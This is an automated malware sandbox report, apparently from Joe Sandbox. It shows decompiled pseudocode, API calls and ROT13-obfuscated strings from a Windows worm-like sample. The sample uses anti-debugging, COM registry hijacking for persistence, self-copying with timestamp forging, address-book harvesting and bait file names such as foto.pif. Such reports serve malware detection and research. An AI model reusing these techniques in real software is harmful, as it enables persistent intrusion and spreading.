				_t106 = (_t103 - 0x000003cc & 0xfffffff0) - 8;
				_t43 = E00404AB8();
				_t114 = _t43;
				if(_t43 != 0) {
					 *_t106 = 0;
					ExitProcess(??); // executed
				}
				_t44 = E004049EA(_t114); // executed
				if(_t44 != 0) {
					 *_t106 = 0;
					ExitProcess(??);
				}
				_t98 =  &_v940;
				asm("cld");
				memset(_t98, 0, 7 << 2);
				_t107 =  &(_t106[3]);
				 *((short*)(_t98 + 7)) = 0;
				_v988 = "user32.dll";
				_v992 = 0x96;
				 *_t107 =  &_v908;
				E00404620();
				_v992 = "fureinaf.qyy";
				_t100 =  &_v940;
				 *_t107 = _t100;
				E00404C38();
				_v988 = _t100;
				_v992 = 0x96;
				_t90 =  &_v588;
				 *_t107 = _t90;
				E00404620();
				 *_t107 = _t90; // executed
				_t51 = E00403F24(); // executed
				_t101 = _t51; // executed
				_t52 = E00403D26(_t90); // executed
				if(_t52 != 0) {
					_t53 = E00403E2E(_t90); // executed
					_t97 = 0;
					__eflags = _t53;
					if(_t53 == 0) {
						_t91 =  &_v588;
						 *_t107 = _t91; // executed
						_t55 = E00404ED6(); // executed
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = _t101;
							if(_t101 == 0) {
								 *_t107 =  &_v588;
								LoadLibraryA(??);
								_t107 = _t107 - 4;
							}
							_v992 = "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Rkcybere\\ihyaiby32\\Irefvba";
							_t102 =  &_v748;
							 *_t107 = _t102;
							E00404C38();
							_v992 = "fgngrz";
							_t92 =  &_v940;
							 *_t107 = _t92;
							E00404C38();
							_v992 = _t92;
							 *_t107 = _t102; // executed
							_t58 = E00404812(_t92); // executed
							_v944 = _t58;
							__eflags = _t58 - 1;
							if(_t58 <= 1) {
								_v976 =  &_v944;
								_v980 = 0;
								_v984 = 0;
								_v988 = E00403AE0;
								_v992 = 0;
								 *_t107 = 0; // executed
								CreateThread(??, ??, ??, ??, ??, ??); // executed
								_t107 = _t107 - 0x18;
							}
							 *_t107 = "SeDebugPrivilege"; // executed
							E00404DF4(); // executed
							 *_t107 = 0x7d0; // executed
							Sleep(??); // executed
							_t109 = _t107 - 4; // executed
							_t60 = E0040402C(_t92); // executed
							__eflags = _t60;
							if(_t60 == 0) {
								 *_t109 =  &_v588; // executed
								LoadLibraryA(??); // executed
								_t109 = _t109 - 4;
							}
							_v992 = "hfonpgvi";
							_t93 =  &_v940;
							 *_t109 = _t93;
							E00404C38();
							_v992 = _t93;
							 *_t109 =  &_v748; // executed
							_t63 = E00404812(_t93); // executed
							_v944 = _t63;
							__eflags = _t63 - 1;
							if(_t63 == 1) {
								E00406A0A(); // executed
							}
							E00407C4E(_t97); // executed
							L18:
							 *_t109 = 0xfa0;
							Sleep(??);
							_t109 = _t109 - 4;
							goto L18;
						}
						E00405DC4(0);
						 *_t107 = _t91;
						E00405D46(_t91, 0);
						E00403C44(_t91, _t100, _t101);
						E004056D0(0);
						 *_t107 = _t91;
						E004054F2(0);
						_v992 = _t91;
						 *_t107 =  &_v908;
						E0040435C(_t91, _t97);
						 *_t107 = _t91;
						LoadLibraryA(??);
						 *(_t107 - 4) = 0xfa0;
						Sleep(??);
						_t97 = 0;
					}
				} else {
					E00405DC4(_t96);
					 *_t107 = _t90;
					E00405D46(_t90, _t96);
					E00403C44(_t90, _t100, _t101);
					E004056D0(_t96);
					 *_t107 = _t90;
					E004054F2(_t96);
					_v992 = _t90;
					 *_t107 =  &_v908;
					E0040435C(_t90, _t96);
					 *_t107 = _t90;
					LoadLibraryA(??);
					_t112 = _t107 - 4;
					 *_t112 = 0xfa0;
					Sleep(??);
					_t113 = _t112 - 4;
					_v992 = "pgszra.rkr";
					 *_t113 = _t100;
					E00404C38();
					_v992 = 0;
					 *_t113 = _t100;
					E00405776(_t90);
					_t97 = 0;
				}
				return _t97;
			}

APIs

WSAStartup.WS2_32 ref: 004040A5

Part of subcall function 00404AB8: IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1

ExitProcess.KERNEL32 ref: 004040BD

Part of subcall function 00403E2E: CreateMutexA.KERNEL32 ref: 00403E5B
Part of subcall function 00403E2E: GetLastError.KERNEL32 ref: 00403E63

Part of subcall function 00404ED6: fopen.MSVCRT ref: 00404EEA
Part of subcall function 00404ED6: fclose.MSVCRT ref: 00404EFB

ExitProcess.KERNEL32 ref: 004040D2
LoadLibraryA.KERNEL32 ref: 00404184
Sleep.KERNEL32 ref: 00404193
LoadLibraryA.KERNEL32 ref: 0040421D
Sleep.KERNEL32 ref: 0040422C
LoadLibraryA.KERNEL32 ref: 0040424B
CreateThread.KERNEL32 ref: 004042C7
Sleep.KERNEL32 ref: 004042E2
LoadLibraryA.KERNEL32 ref: 004042FC
Sleep.KERNEL32 ref: 00404348

Part of subcall function 00405DC4: CreateFileA.KERNEL32 ref: 00405E5E
Part of subcall function 00405DC4: ExitProcess.KERNEL32 ref: 00405E7E
Part of subcall function 00405DC4: CloseHandle.KERNEL32 ref: 00405E9E

Part of subcall function 00405D46: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405D83
Part of subcall function 00405D46: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004041F6), ref: 00405DB7

Part of subcall function 004056D0: GetModuleFileNameA.KERNEL32 ref: 004056F4
Part of subcall function 004056D0: CopyFileA.KERNEL32 ref: 0040573B

Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0

Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467

Strings

fgngrz, xrefs: 00404269
hfonpgvi, xrefs: 00404304
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00404253
SeDebugPrivilege, xrefs: 004042CF
pgszra.rkr, xrefs: 0040419B
user32.dll, xrefs: 004040EF
fureinaf.qyy, xrefs: 0040410D

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$Create$Sleep$CloseHandle$LibraryLoadPointerWrite$ExitProcess$Time$CopyDebuggerErrorLastModuleMutexNamePresentStartupThreadfclosefopen
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$SeDebugPrivilege$fgngrz$fureinaf.qyy$hfonpgvi$pgszra.rkr$user32.dll
API String ID: 2057360409-330933156
Opcode ID: 62c06f15e8a8a4903defcd31abaa162168b736c410436fbf91360ca6e0015f36
Instruction ID: 0cfcdf05f74210d9808c357536bce9e529f0bcd84bc5eb1993387659449c0d65
Opcode Fuzzy Hash: 62c06f15e8a8a4903defcd31abaa162168b736c410436fbf91360ca6e0015f36
Instruction Fuzzy Hash: 67610EB09087048AD710BF75C58625EBAE4AF81308F41997FE9C4776C2DB7C96888F5B

Uniqueness

Uniqueness Score: -1.00%

Function 00407C4E Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 196
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32 ref: 00407E14
CreateThread.KERNEL32 ref: 00408044

Strings

command, xrefs: 00407FE5
2wrwb=xfpav'g{sm#~gp, xrefs: 00407D04
(ohcx%gmlvl#b|d}m8e|k, xrefs: 00407DEE
2317q129n58non7o3148por15qs741r3, xrefs: 00407CC7
4upyl?idzyt9z~`n%|e~, xrefs: 00407D50
p515p225982son69p76q604qp7s97975, xrefs: 00407CB4

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CreateLocalThreadTime
String ID: (ohcx%gmlvl#b|d}m8e|k$2317q129n58non7o3148por15qs741r3$2wrwb=xfpav'g{sm#~gp$4upyl?idzyt9z~`n%|e~$command$p515p225982son69p76q604qp7s97975
API String ID: 3972831565-1317110218
Opcode ID: c0940dc48e777e953e80c9506aec9b4cff2f9c7de88b90671404fd8019e1cdc9
Instruction ID: 80463a4929d65f88bb62c6d7506587d1b44305c3c58205fc38c9e757c491522e
Opcode Fuzzy Hash: c0940dc48e777e953e80c9506aec9b4cff2f9c7de88b90671404fd8019e1cdc9
Instruction Fuzzy Hash: F8A1F2B08083199ADB10DF55C5453DEBBF0BB94304F5089AED588A7381D7B89AC9CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 83
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 004082DE
Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 00408336
Part of subcall function 0040829C: CloseHandle.KERNEL32 ref: 00408356

Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408409
Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408422
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 00408436
Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 00408480
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 0040848E
Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 004084BC
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 004084CA
Part of subcall function 0040829C: SetFilePointer.KERNEL32 ref: 004084F0
Part of subcall function 0040829C: ReadFile.KERNEL32 ref: 00408529

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Sleep.KERNEL32 ref: 00403BC2

Strings

fgngrz, xrefs: 00403BF3
Readme.exe, xrefs: 00403B45
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403BDD
tepbcl.qyy, xrefs: 00403AEB
foto.pif, xrefs: 00403B96
mvcsv.qyy, xrefs: 00403B1B
x, xrefs: 00403B80
mvcsvnd.qyy, xrefs: 00403B66

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$lstrlen$CreateHandleSizeWritelstrcat$CloseConnectedDirectoryInternetLibraryLoadModulePointerReadSleepStateSystemmemset
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$Readme.exe$fgngrz$foto.pif$mvcsv.qyy$mvcsvnd.qyy$tepbcl.qyy$x
API String ID: 1266463258-727612787
Opcode ID: 819f8b6b43c1a4bc741779b6a6ad3373cdd59e2baf942c7b0dbc45e149701a7a
Instruction ID: aba1e27b33e5380b7e2637a9dd0f7b6f92beebfe16ff9740c24b48d29de174a4
Opcode Fuzzy Hash: 819f8b6b43c1a4bc741779b6a6ad3373cdd59e2baf942c7b0dbc45e149701a7a
Instruction Fuzzy Hash: 00313BB08097159AD310BF22C58529EBBE4AF80749F41CC7EF5C867281DB3C9689DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403F24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00403F24(int _a4) {
				void* _v12;
				char _v140;
				void* _v144;
				void* _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				int _v196;
				int _v200;
				int _v204;
				long _t28;
				char* _t36;
				int _t37;
				int _t38;
				void* _t39;
				void* _t41;
				intOrPtr* _t42;

				_t38 = _a4;
				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
				_t36 =  &_v140;
				_v204 = _t36;
				E00404C38();
				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
				_t41 = _t39 - 0xac;
				if(_t28 == 0) {
					L2:
					_v204 = _t38;
					L0040C310();
					_t42 = _t41 - 4;
					_v188 = _t28 + 1;
					_v192 = _t38;
					_v196 = 1;
					_v200 = 0;
					_v204 = 0;
					 *_t42 = _v144; // executed
					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
					 *((intOrPtr*)(_t42 - 0x18)) = _v144; // executed
					RegCloseKey(??); // executed
					_t37 = 1;
				} else {
					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0);
					_t41 = _t41 - 0x24;
					_t37 = 0;
					if(_t28 == 0) {
						goto L2;
					}
				}
				return _t37;
			}

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403F6D
RegCreateKeyExA.ADVAPI32 ref: 00403FBE
lstrlen.KERNEL32 ref: 00403FD2
RegSetValueExA.ADVAPI32 ref: 00404004
RegCloseKey.ADVAPI32 ref: 00404015

Strings

PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32, xrefs: 00403F32

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32
API String ID: 2036214137-2655177054
Opcode ID: ec1065b16dadf3c4c55f63c78a6684bde4f16d54d4dd78719c56537c8a878fff
Instruction ID: 019c3a761b18c338743e8a7ff589e139028416f66cb1f4fe329e007e5a71a312
Opcode Fuzzy Hash: ec1065b16dadf3c4c55f63c78a6684bde4f16d54d4dd78719c56537c8a878fff
Instruction Fuzzy Hash: FB21E6B08083159BE710EF25C58535ABBF4BB84348F00896EE88897281E77996488F92

Uniqueness

Uniqueness Score: -1.00%

Function 00403D26 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403D7B
RegCloseKey.ADVAPI32 ref: 00403D90
RegCreateKeyExA.ADVAPI32 ref: 00403E00
RegCloseKey.ADVAPI32 ref: 00403E15

Strings

Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403D30

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Close$CreateOpen
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba
API String ID: 1299239824-3858799484
Opcode ID: e2de8787ab8b28c2df9a00a001bc5332683bdceb8eef226184d97ba353dea354
Instruction ID: 372c3b0a06c6ee96941f7226abfc86991cfccc6d41bd2ee5df839bccf0e05334
Opcode Fuzzy Hash: e2de8787ab8b28c2df9a00a001bc5332683bdceb8eef226184d97ba353dea354
Instruction Fuzzy Hash: 502131B0914315CEE710EF35C58579ABBF8BB44308F408A7EE484E7281E779C6888F52

Uniqueness

Uniqueness Score: -1.00%

Function 0040396E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 004039A1
memset.MSVCRT ref: 004039CA
RegQueryValueExA.ADVAPI32 ref: 00403A08
RegCloseKey.ADVAPI32 ref: 00403A19

Part of subcall function 00403390: CreateFileA.KERNEL32 ref: 004033D2
Part of subcall function 00403390: GetFileSize.KERNEL32 ref: 00403409
Part of subcall function 00403390: CreateFileMappingA.KERNEL32 ref: 00403448
Part of subcall function 00403390: CloseHandle.KERNEL32 ref: 0040346E

Strings

Software\Microsoft\WAB\WAB4\Wab File Name, xrefs: 00403992

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$CloseCreate$HandleMappingOpenQuerySizeValuememset
String ID: Software\Microsoft\WAB\WAB4\Wab File Name
API String ID: 1684987478-619501371
Opcode ID: ae81365a51869575d2673718a71df65f94980f08528c5a3444192b759fc5e03b
Instruction ID: fb9affdcd003a3e7f59b61beff737c010c0f055de032600ad664b438ea4410d9
Opcode Fuzzy Hash: ae81365a51869575d2673718a71df65f94980f08528c5a3444192b759fc5e03b
Instruction Fuzzy Hash: EB119DB0804755DFD710EF25C98939FBBF4BB44348F40896EE88867381D7B996888F96

Uniqueness

Uniqueness Score: -1.00%

Function 00405316 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00405316(char* __ebx) {
				void* _v8;
				char _v76;
				intOrPtr _v88;
				int _t5;
				char* _t9;
				char* _t11;
				char* _t13;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr* _t16;
				char** _t17;

				_t15 = _t14 - 0x54;
				_v88 = 0x40;
				_t11 =  &_v76;
				 *_t15 = _t11; // executed
				_t5 = gethostname(__ebx, ??); // executed
				_t16 = _t15 - 8;
				 *_t16 = _t11; // executed
				L004086D8(); // executed
				_t17 = _t16 - 4;
				_t13 = "192.168.1.2";
				if(_t5 != 0) {
					_t9 =  *( *( *(_t5 + 0xc)));
					 *_t17 = _t9;
					L004086E0();
					_t13 = _t9;
				}
				return _t13;
			}

0x0040531a
0x0040531d
0x00405325
0x00405328
0x0040532b
0x00405330
0x00405333
0x00405336
0x0040533b
0x0040533e
0x00405345
0x0040534c
0x0040534e
0x00405351
0x00405359
0x00405359
0x00405361

APIs

gethostname.WS2_32 ref: 0040532B
gethostbyname.WS2_32 ref: 00405336
inet_ntoa.WS2_32 ref: 00405351

Strings

@, xrefs: 0040531D
192.168.1.2, xrefs: 0040533E

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: gethostbynamegethostnameinet_ntoa
String ID: 192.168.1.2$@
API String ID: 289322838-3711723240
Opcode ID: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
Instruction ID: 9ec42d045907c7db8908afb764d072bf234eb471670fc80d8c874dbff0fee724
Opcode Fuzzy Hash: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
Instruction Fuzzy Hash: 7EE030B0A04B048FC700FF39C6C650ABBF4AF44348F06487DE986A7355EA38E9088B57

Uniqueness

Uniqueness Score: -1.00%

Function 00404F0A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
librarynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00404F27
LoadLibraryA.KERNEL32 ref: 00404F41
InternetGetConnectedState.WININET ref: 00404F6B

Strings

jvavarg.qyy, xrefs: 00404F11

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ConnectedHandleInternetLibraryLoadModuleState
String ID: jvavarg.qyy
API String ID: 2811557832-2169444084
Opcode ID: 459549567aad282bd9fd98faa7fbda873157d6092b922e6f444ffb020b89b8ec
Instruction ID: fa78873cf606c18224dba544ef8f20ca223ab6e2b08164375e4fcb1cbc50bc80
Opcode Fuzzy Hash: 459549567aad282bd9fd98faa7fbda873157d6092b922e6f444ffb020b89b8ec
Instruction Fuzzy Hash: 03F062B551530486DB10BF359AC629D7AE85F41368F058A3EF8A1A32D2E73CD64CC716

Uniqueness

Uniqueness Score: -1.00%

Function 00403A38 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38sleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403A5C
GetDriveTypeA.KERNEL32 ref: 00403A9D
Sleep.KERNEL32 ref: 00403AB1

Part of subcall function 00403790: _mbscpy.MSVCRT ref: 004037D8
Part of subcall function 00403790: memset.MSVCRT ref: 0040383B
Part of subcall function 00403790: FindFirstFileA.KERNEL32 ref: 0040385C
Part of subcall function 00403790: lstrcpy.KERNEL32 ref: 004038CC
Part of subcall function 00403790: _mbscat.MSVCRT ref: 00403910

Strings

C:\, xrefs: 00403A85

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: memset$DriveFileFindFirstSleepType_mbscat_mbscpylstrcpy
String ID: C:\
API String ID: 3442435128-3404278061
Opcode ID: d293f12a55a22e19086a37f23bce7869846b5feac95dcf43aac975cafdb9633c
Instruction ID: ed4c8215e4a3680eb399a4dacd5268703db01feabc7491714eb621602a4a9c6d
Opcode Fuzzy Hash: d293f12a55a22e19086a37f23bce7869846b5feac95dcf43aac975cafdb9633c
Instruction Fuzzy Hash: 1A015BB0C143AC89DB65AB6588563DEBFB49F01319F0484DED6C826282C7784BD8CFD6

Uniqueness

Uniqueness Score: -1.00%

Function 00404812 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403C15), ref: 0040484C
RegOpenKeyExA.ADVAPI32 ref: 0040487A
RegQueryValueExA.ADVAPI32 ref: 004048B5
RegCloseKey.ADVAPI32 ref: 004048C5

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: ad4d9fd33ac52e88bc97e916be29138adab017c360a3b7e03bc0d3226ec02f29
Instruction ID: 49bf87151660670d78cfdeefb83c057e4f3b6f757f6147e457b2a6993822bbc7
Opcode Fuzzy Hash: ad4d9fd33ac52e88bc97e916be29138adab017c360a3b7e03bc0d3226ec02f29
Instruction Fuzzy Hash: 0D21C8F49043099FDB00EF69C18575EBBF4BB48348F40892EE998A7341E378DA488B52

Uniqueness

Uniqueness Score: -1.00%

Function 00404748 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
